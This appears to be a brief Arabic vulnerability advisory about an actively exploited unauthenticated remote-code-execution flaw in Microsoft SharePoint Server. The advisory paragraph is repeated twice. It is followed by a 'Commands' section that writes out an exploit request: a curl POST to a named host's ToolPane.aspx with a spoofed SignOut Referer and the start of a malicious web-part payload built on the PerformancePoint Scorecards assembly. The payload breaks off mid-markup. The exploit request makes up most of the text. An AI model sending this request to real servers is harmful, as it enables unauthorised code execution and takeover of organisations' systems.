
ثغرة أمنية خطيرة في Microsoft SharePoint Server تسمح بتنفيذ تعليمات برمجية عن بعد غير مصادق عليه عبر إلغاء تسلسل بيانات غير موثوقة. مايكروسوفت على علم بالاستغلال النشط؛ قم بتطبيق إجراءات التخفيف الخاصة بـ CVE فورًا. مستوى الخطورة: حرج.
ثغرة حرجة في خادم Microsoft SharePoint تسمح بتنفيذ أوامر عن بعد بدون مصادقة عبر إلغاء تسلسل بيانات غير موثوقة. تدرك Microsoft أن الثغرة تُستغل بنشاط؛ قم بتطبيق التخفيفات الخاصة بـ CVE فورًا. الخطورة: حرجة.
الأوامر
curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx'
-H 'Referer: /_layouts/SignOut.aspx'
-H 'Content-Type: application/x-www-form-urlencoded'
--data-urlencode 'MSOTlPn_Uri=https://reeaccated.com'
--data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">